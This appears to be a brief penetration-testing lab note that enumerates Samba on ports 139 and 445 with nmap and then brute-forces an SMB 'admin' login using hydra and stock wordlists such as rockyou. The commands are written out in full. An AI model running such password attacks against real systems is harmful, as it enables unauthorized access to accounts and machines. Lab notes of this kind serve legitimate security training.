Brute Force

#Enumeration

nmap -sV <ip address>
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: RECONLABS)

NOTE:- These versions of SAMBA are vulnerable but for now we will brute force it

#Brute force

gzip -d /usr/share/wordlists/rockyou.txt.gz


hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.34.128.3 smb

Last updated